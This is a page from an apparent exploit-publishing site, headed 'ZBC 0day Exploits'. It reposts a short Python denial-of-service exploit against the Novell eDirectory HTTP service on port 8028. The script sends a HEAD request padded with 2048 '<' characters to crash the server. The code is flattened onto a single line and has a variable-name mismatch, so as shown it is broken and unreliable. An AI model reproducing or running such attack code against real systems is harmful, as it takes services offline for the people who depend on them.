ZBC 0day Exploits

ZBC means Zcuu Bug Center.The main duties is Published Exploits and 0day. We have the fastest, latest and the best we to Published 0day.


您当前的位置:zbc exploitsexpdospoc → 文章内容 退出登录 用户管理
Hot
Near
Novel eDirectory HTTP Denial of Service Exploit
Author:佚名  ComeFrom:不详  Time:2008-6-18 13:00:22

little big

#!/usr/bin/python# Novel eDirectory HTTP DOS# Discovered and coded by Mati Aharoni# muts..at..offensive-security.com# http://www.offensive-security.com/0day/novel-edir.py.txtimport socketimport osimport sysfrom time import sleepbiff="<"*2048print "[*] Payload sent "+ str(len(buff))expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )expl.connect ( ( sys.argv[1], 8028 ) )expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')data=expl.recv(1024)print dataexpl.close()# exp.zcuu.com [2008-04-02]
[] [goback] [print]